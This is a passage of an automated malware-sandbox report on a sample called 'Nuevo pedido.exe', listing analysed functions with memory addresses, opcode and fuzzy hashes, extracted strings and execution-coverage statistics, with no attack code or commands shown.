Instruction Fuzzy Hash: D1E11C74E042298FDB14DFA9D5809AEFBF2FF89304F249169E414AB356D730A941CFA0

Function 06F3DCBF Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2e47a2d826323af39b0c3f3fc216a4f5282df92ffd774317055a2f2f626b843
Instruction ID: f49c3e2cc7882526c2f668298593f174e73d213e2f390bdaa5bef5c0b860c4f9
Opcode Fuzzy Hash: e2e47a2d826323af39b0c3f3fc216a4f5282df92ffd774317055a2f2f626b843
Instruction Fuzzy Hash: F7E11C74E002198FCB54DFA9D5809AEFBF2FF89304F249169E414AB356DB31A981CF61

Function 02670478 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 427001a84de15e982df993f35d508e2790edf16ea28cfcc32b0b95481edb408e
Instruction ID: 512d7d4caf0869169a1e23eeec6849d726eae3b456e65a051af4e90b8655d341
Opcode Fuzzy Hash: 427001a84de15e982df993f35d508e2790edf16ea28cfcc32b0b95481edb408e
Instruction Fuzzy Hash: DAE1FB74E002198FDB14DFA9D5809AEFBF2FF89304F249169E414AB356D731A981CFA1

Function 02670040 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8856842dcf2813c0a4b0464e38b6de9f4d391a959430da05929539e34313e79f
Instruction ID: 7d083edbfb906e6987349a6ea7b117d94ffe2a96f6a5d01af51c13bc28b5bbc8
Opcode Fuzzy Hash: 8856842dcf2813c0a4b0464e38b6de9f4d391a959430da05929539e34313e79f
Instruction Fuzzy Hash: 95E1FC74E006198FCB14DFA9D5809AEFBF2FF89304F249169E418AB356D731A981CF60

Function 06F3F378 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9d2c5873f2c51d5a3508b8dac76532620822e2d9526451a00a6180e0b9828ab
Instruction ID: 5dc04bc937bb29f98e70d9d6727700625618c680fc82452bf36138d7c7d76bb2
Opcode Fuzzy Hash: d9d2c5873f2c51d5a3508b8dac76532620822e2d9526451a00a6180e0b9828ab
Instruction Fuzzy Hash: 8FE1FA74E0121A8FCB54DFA9D5809AEFBF2FF89304F249169E414AB356D730A941CFA0

Function 0275D5BC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1729322384.0000000002750000.00000040.00000800.00020000.00000000.sdmp, Offset: 02750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2750000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a0f93e94dd0abc1d72450278bd3e09ead297c9ed7cc33529fab623b3d2adc81
Instruction ID: b3b6839d043c2ee348781c81f0ad10c89a48ac08264b574baf4e5dc9008c662e
Opcode Fuzzy Hash: 5a0f93e94dd0abc1d72450278bd3e09ead297c9ed7cc33529fab623b3d2adc81
Instruction Fuzzy Hash: 00A17E32E002258FCF05DFB4C84459EFBB2FF86314B25856AE805AB265DBB1E955CF81

Function 06F31E10 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79d7466227572f6cc65c0920171f97695b6e1f312c62a68b746bb95d0e827161
Instruction ID: ca26c287de452a8a95c9a91cf8c55aa018b03bce09dc512faa1cf6542c276c5c
Opcode Fuzzy Hash: 79d7466227572f6cc65c0920171f97695b6e1f312c62a68b746bb95d0e827161
Instruction Fuzzy Hash: B181D275E15219CFCB44CFA9D58499EFBF2FF88210F14956AD419AB320D330AA46CF91

Function 06F31E00 Relevance: .2, Instructions: 185COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75fde6871585b26eb28c7b20d58b252b1364d7cd6654da35717413b4b84c8ff8
Instruction ID: 9543ec51dfb77d184f949c0627e3054e0603e853b2473d3fba352dbe32420863
Opcode Fuzzy Hash: 75fde6871585b26eb28c7b20d58b252b1364d7cd6654da35717413b4b84c8ff8
Instruction Fuzzy Hash: F481C175A1521ACFCB44CFA9D58499EFBF2FF88210F149566D419AB320D730EA42CF91

Function 06F32CD8 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18fa26650d65e4874d15c9f5d47d6457564766ca7820123199ccf755efb605ac
Instruction ID: bd0010b19761ef626423d6b59ee6b44f9c27907f7a510d4e7573f1c0acb7ee4c
Opcode Fuzzy Hash: 18fa26650d65e4874d15c9f5d47d6457564766ca7820123199ccf755efb605ac
Instruction Fuzzy Hash: A56116B5E042199FDB44CFAAD5815AEFBB2FF89300F14945AD425B7204D734AA82CF91

Function 06F32CC9 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a939c4c5dae2a1b1f8504323bee5d4a5124268cfee56ff65fdeb7c9fe4884bf6
Instruction ID: d4089f4b3b21957b59bb882e4833f524b9b88bc2b0da707eadb7040ce67604eb
Opcode Fuzzy Hash: a939c4c5dae2a1b1f8504323bee5d4a5124268cfee56ff65fdeb7c9fe4884bf6
Instruction Fuzzy Hash: 675139B1E0421A9FDB44CFAAD5816AEFBB2FF89300F14D466D415B7214D734AA82CF90

Function 06F3F367 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5351853755402e16a3e80dccdab3f629581eac7f4790cbae48520453db8916c8
Instruction ID: 5f188e56a0784a2f91b5137451ad5435b16fc2a4d777478dccf386d955bfbbbe
Opcode Fuzzy Hash: 5351853755402e16a3e80dccdab3f629581eac7f4790cbae48520453db8916c8
Instruction Fuzzy Hash: 0A512A70E0521A8FDB14CFA9D5805AEBBF2FF89304F24C1AAD418AB356D7319941CFA1

Function 02670473 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1728761583.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2670000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be516310da1503f2393d1b998098aa908a48641850334f46bd050125f184d279
Instruction ID: 4b754a65cd8e02d0cad0a268cf35daa50c6396b7610f676760ce41ec2e7b4f58
Opcode Fuzzy Hash: be516310da1503f2393d1b998098aa908a48641850334f46bd050125f184d279
Instruction Fuzzy Hash: 0151E974E0021A8BDB14DFAAD5805AEFBF2FF89304F24D169E418A7316D7319941CFA5

Function 06F31C50 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1737127749.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6f30000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7b0536f70abadd87de430e10772c447b344d76a5a7be799b8b65c5ff3a56e50
Instruction ID: c564db3c7b3eff6b6072a9b970f3ea75d91e19f9f6075694f2ea4b886d519665
Opcode Fuzzy Hash: a7b0536f70abadd87de430e10772c447b344d76a5a7be799b8b65c5ff3a56e50
Instruction Fuzzy Hash: A9415B70E01119EFDB84CFA9C9809AEFBB2FF84340F24D5A9C405A7255EB309A41CF90

Analysis Process: Nuevo pedido.exePID: 7764, Parent PID: 7288COMMON

Execution Graph

Execution Coverage:	13.5%
Dynamic/Decrypted Code Coverage:	94.4%
Signature Coverage:	0%
Total number of Nodes:	124
Total number of Limit Nodes:	11

Executed Functions

Function 02F77118 Relevance: 6.6, Strings: 5, Instructions: 352
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 02F77212
(o^q, xrefs: 02F7753D
,bq, xrefs: 02F77298
(o^q, xrefs: 02F77220
,bq, xrefs: 02F7728A

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-2525668591
Opcode ID: 1d7fbef498cc791d5b7f2be465757492fa678e08c924b32b8566d2ea9ccc2933
Instruction ID: 9a557fe7ba8c01c8a08ae4a87e96faee267f4c939931a2ede4ee6bf83e496eca
Opcode Fuzzy Hash: 1d7fbef498cc791d5b7f2be465757492fa678e08c924b32b8566d2ea9ccc2933
Instruction Fuzzy Hash: BDE13831E10109DFCB15EFA9D984AADFBB2BF88384F15846AE915EB365D730E841CB50

Function 02F729EC Relevance: 5.4, Strings: 4, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 02F72A9E
Xbq, xrefs: 02F72B57
Xbq, xrefs: 02F72AD8
Xbq, xrefs: 02F72BA4

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 39a99bec66c62ef22a3c78d9870f5a8b739459c66011ebedb0738e17820148fd
Instruction ID: 4ac6fd40430633dadf2804740c97a4052aa2eaf3f3b0984cf1040dcde38d69e3
Opcode Fuzzy Hash: 39a99bec66c62ef22a3c78d9870f5a8b739459c66011ebedb0738e17820148fd
Instruction Fuzzy Hash: 22E1F332F04395DFDB124F388A6579BBBF2EF9A684F0804EADE4156602E7354492EF41

Function 02F7A088 Relevance: 3.4, Strings: 2, Instructions: 894COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02F7AB13
(o^q, xrefs: 02F7A518

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: 5b540f2d6aafa58472c8c965fac62081f8758acef27c28f3c37323bb805a403d
Instruction ID: 1d4600812af7f6e8fa833e91537cd0cd8fd80c60a69d37e74d87188a38195e08
Opcode Fuzzy Hash: 5b540f2d6aafa58472c8c965fac62081f8758acef27c28f3c37323bb805a403d
Instruction Fuzzy Hash: E0825E31A00209DFCB15CFA8C584AAEBBB2FF88394F16856AE5059B365D731ED91CB50

Function 02F769A0 Relevance: 3.0, Strings: 2, Instructions: 514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 02F76EDA
Hbq, xrefs: 02F76DA6

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: e216f865fe3642d3ff541250aef993e0c9bfe820317f36b77a0153c6c1a83c6d
Instruction ID: 7fda1c49ea19af95f832392cdf0b436872aa80d58aab02c702470de0b143940e
Opcode Fuzzy Hash: e216f865fe3642d3ff541250aef993e0c9bfe820317f36b77a0153c6c1a83c6d
Instruction Fuzzy Hash: 08127C71A006198FDB14DF69C854BAEBBF6BF88744F14856AE906EB390DF309D41CB90

Function 02F7C146 Relevance: 2.7, Strings: 2, Instructions: 225
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 02F7C400
PH^q, xrefs: 02F7C3EF

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 5fa3b7055297e448fccf69bd386b68a9d0e4eae1fde1aaeacdb3b48fdc208b88
Instruction ID: 8cc644bd6f56807efac4dabe28b2d45a4a031232ad478b96ddb6e683d94a0354
Opcode Fuzzy Hash: 5fa3b7055297e448fccf69bd386b68a9d0e4eae1fde1aaeacdb3b48fdc208b88
Instruction Fuzzy Hash: 22A1D475E00218CFDB54DFAAD884A9DBBF2FF89350F14806AE509AB361DB719885CF50

Function 02F7C738 Relevance: 2.7, Strings: 2, Instructions: 184COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F7C98F
PH^q, xrefs: 02F7C9A0

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 19359de88fb9a50ea74360ce5d93aa0ec7fe5a611f6fbb25725693ded5e32a60
Instruction ID: da7a67e76d2db359f14871a59e618fe9680b001978f162d96b9dad2823b3670e
Opcode Fuzzy Hash: 19359de88fb9a50ea74360ce5d93aa0ec7fe5a611f6fbb25725693ded5e32a60
Instruction Fuzzy Hash: F681B374E00218CFDB54CFAAD994A9DBBF2BF88300F14C06AE519AB365DB309985CF50

Function 02F7D28B Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F7D4CF
PH^q, xrefs: 02F7D4E0

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 9b03105f978020f739b637e2b6a5d5e58a33cb13c58a6ce1270af1bea3c7ee20
Instruction ID: e45a4974edbd69ab14d8a119f546646532218a36407a3d0552824cd5ca61202d
Opcode Fuzzy Hash: 9b03105f978020f739b637e2b6a5d5e58a33cb13c58a6ce1270af1bea3c7ee20
Instruction Fuzzy Hash: 0381B774E00218CFDB58DFAAD984A9DBBF2BF89300F54C06AD509AB365DB349985CF10

Function 02F75383 Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F755C8
PH^q, xrefs: 02F755D9

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 659085e1fa97b91b2f9a7af75b3478fecf0cc9e6d94c927ee89c115d1fea0497
Instruction ID: 7f70503a1b9d452813718bacfe07fb65f1392e52879bbe32dfec222339a16174
Opcode Fuzzy Hash: 659085e1fa97b91b2f9a7af75b3478fecf0cc9e6d94c927ee89c115d1fea0497
Instruction Fuzzy Hash: 3B81A674E00218CFDB54DFAAD984A9DBBF2BF88304F54C06AD909AB365DB349985CF50

Function 02F7CA1B Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F7CC70
PH^q, xrefs: 02F7CC5F

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 6304fe7a9fbb429b1ab84ebe742995f73507c71b5e46b33e5f2f48f10747442e
Instruction ID: 42a585cbe477bc9305d69a0f520e808b6dabea3ed90a11c8c7bde9cf7c77c385
Opcode Fuzzy Hash: 6304fe7a9fbb429b1ab84ebe742995f73507c71b5e46b33e5f2f48f10747442e
Instruction Fuzzy Hash: 0081A574E00258CFDB14DFAAD984A9DBBF2BF88300F14D06AE519AB365DB349985CF50

Function 02F7CFBB Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F7D1FF
PH^q, xrefs: 02F7D210

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: ac79489045f4d93efa26bcff0f1f7d339de4a2d22f76d79b4f40cc4c978788bd
Instruction ID: bb05f758251f0674754f44b1b42b80e98192cb404f363178d278e33fbc456a67
Opcode Fuzzy Hash: ac79489045f4d93efa26bcff0f1f7d339de4a2d22f76d79b4f40cc4c978788bd
Instruction Fuzzy Hash: B581A974E00218CFEB14DFAAD984A9DBBF2BF88300F54D06AD519AB365DB709985CF10

Function 02F7CCEB Relevance: 2.7, Strings: 2, Instructions: 178COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F7CF2F
PH^q, xrefs: 02F7CF40

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: e5910bcbdbf8c6f43ea6b26879cee3bc084b403e2edf0d55e32dd06fdc3fa20c
Instruction ID: d16787ca62d21c3a6874e50f13a2859d51e33d64e96dc6f4838505cb0d5f6bc0
Opcode Fuzzy Hash: e5910bcbdbf8c6f43ea6b26879cee3bc084b403e2edf0d55e32dd06fdc3fa20c
Instruction Fuzzy Hash: 6C819474E00218CFDB54DFAAD984A9DBBF2BF88300F14C06AE519AB365DB349985CF50

Function 02F7C47B Relevance: 2.6, Strings: 2, Instructions: 145COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F7C6D0
PH^q, xrefs: 02F7C6BF

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: 0e65cdd1219aeb6c7559752203e59e84690a771bc2172413fd14eefcd84a6632
Instruction ID: 676dc0ed0977ea152f92054c2090246793c1c6fd7c190c89bba6a6df148881df
Opcode Fuzzy Hash: 0e65cdd1219aeb6c7559752203e59e84690a771bc2172413fd14eefcd84a6632
Instruction Fuzzy Hash: 2F51A374E002188FDB18DFAAD984A9DBBF2BF88300F14D06AD518AB365DB749985CF50

Function 02F7F618 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d95862ee4cbc3f62465075ef102311514a33b6bc1ad9793108a2eee2af2f70e4
Instruction ID: a89ebacc7cb62eed6d7bc46847b8d24edc0bb9883754109c99df622726115571
Opcode Fuzzy Hash: d95862ee4cbc3f62465075ef102311514a33b6bc1ad9793108a2eee2af2f70e4
Instruction Fuzzy Hash: 1FE1F074D01219CFDB64CFB5D858BADBBB2FF89305F1085AAD40AA7250DB749A85CF10

Function 02F7E97A Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a10f5a568df3d9c9f6dcef7dedb57390083c363231856e325a60e928ca17877
Instruction ID: 62c6184ea4e3ff910b5dfa1cc0a8fdbfba7dcff3299860031f488063a3c1beb3
Opcode Fuzzy Hash: 7a10f5a568df3d9c9f6dcef7dedb57390083c363231856e325a60e928ca17877
Instruction Fuzzy Hash: 9D51C675E00208DFDB18DFAAD984A9DBBB2FF88300F14C16AE915AB364DB319845CF54

Function 02F7E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d00cf272411e34e782b6b2f84e4400ce69307521724f84de2fee81649da7379
Instruction ID: af87777d91671020b62ab805e50797399d8e29c0029c22f838014755150905f9
Opcode Fuzzy Hash: 0d00cf272411e34e782b6b2f84e4400ce69307521724f84de2fee81649da7379
Instruction Fuzzy Hash: B651A774E00208DFDB18DFAAD584A9DBBF2FF88300F20856AE915AB364DB319945CF54

Function 02F776F1 Relevance: 10.5, Strings: 8, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 02F777E9
(o^q, xrefs: 02F77BFF
,bq, xrefs: 02F77BA0
(o^q, xrefs: 02F7772E
(o^q, xrefs: 02F77815
,bq, xrefs: 02F77B90
(o^q, xrefs: 02F77C0F
(o^q, xrefs: 02F778B2

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: 26be88989ae37900c8f868675b635f7f1054546802e1739815e2a43d371d419d
Instruction ID: 67352957c5caeda56aebcb4ae748556b225974b68ea6081cf4a0d36378a11edc
Opcode Fuzzy Hash: 26be88989ae37900c8f868675b635f7f1054546802e1739815e2a43d371d419d
Instruction Fuzzy Hash: 1E124630A102088FCB15EF69D984AAEBBF2FF88354F14856AE519DB365D730ED41CB90

Function 02F75F38 Relevance: 2.8, Strings: 2, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 02F76056
Hbq, xrefs: 02F76023

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: b48ee06018f0aa190f32f4b25d1bce0df277cec2ed321d3460e6159bc95832e8
Instruction ID: c528cffbbd4b71ca5dd90a6e84c2a8c5faa14bc6078978192771cb1ba8854cf4
Opcode Fuzzy Hash: b48ee06018f0aa190f32f4b25d1bce0df277cec2ed321d3460e6159bc95832e8
Instruction Fuzzy Hash: 1B91CF31B042458FDB15AF34D858B6E7BA6BF88684F08886AE906CB392CF75C841C791

Function 02F76498 Relevance: 2.7, Strings: 2, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

,bq, xrefs: 02F76578
,bq, xrefs: 02F7656E

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: ,bq$,bq
API String ID: 0-2699258169
Opcode ID: b828db39647218b9a2927ba30beebc34e5a45026718cd9fcbd7c85b7287cd85f
Instruction ID: c6bbef9e54b10aedec248e808614dbf91f64f502be59b9f5825328d0fcb341e8
Opcode Fuzzy Hash: b828db39647218b9a2927ba30beebc34e5a45026718cd9fcbd7c85b7287cd85f
Instruction Fuzzy Hash: 7881A135F00905CFCB14DF69C884AAABBBABF88688B54816AD605DB364DB31E841CF50

Function 02F7AEBA Relevance: 2.7, Strings: 2, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 02F7AECD
(o^q, xrefs: 02F7B079

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: (o^q$(o^q
API String ID: 0-1946778100
Opcode ID: eedbf0f9d0eac88614780f57a7863b16ff821a508349a55861b2b802410b663f
Instruction ID: a85c348869d00ad2fd1dfb9e56eb7bd056067ab90bf9ce28f3b368132985488b
Opcode Fuzzy Hash: eedbf0f9d0eac88614780f57a7863b16ff821a508349a55861b2b802410b663f
Instruction Fuzzy Hash: 4561B331B001098FC704DF69C854AAEBBB2FFC9798B14856AE616DB3A4DB319C11CB90

Function 02F7C468 Relevance: 2.7, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

PH^q, xrefs: 02F7C6D0
PH^q, xrefs: 02F7C6BF

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: PH^q$PH^q
API String ID: 0-1598597984
Opcode ID: bbcd0bfc17388ed08520cee1bb70c6f5d68f8ee87794cc48b8f5f1e667dc292d
Instruction ID: cd914a72c476316edf89ca9c5b00bc786698db743e9b8dcba71f2ffe94ab77f0
Opcode Fuzzy Hash: bbcd0bfc17388ed08520cee1bb70c6f5d68f8ee87794cc48b8f5f1e667dc292d
Instruction Fuzzy Hash: BA71C174E00258CFDB14DFA9D884A9DBBF2FF49310F1090AAE919AB361DB319985CF50

Function 02F79C30 Relevance: 2.6, Strings: 2, Instructions: 150COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02F79D6D
4'^q, xrefs: 02F79D84

Memory Dump Source

Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: ee32396ca888eef65f5ef1e8922798cbe71e66f635f84e6617eb60e258b6cfae
Instruction ID: d3e7716e3d18a2a24b6d15c45f95f2d70da7fc0ffa4984d988c1e0fe9201240b
Opcode Fuzzy Hash: ee32396ca888eef65f5ef1e8922798cbe71e66f635f84e6617eb60e258b6cfae
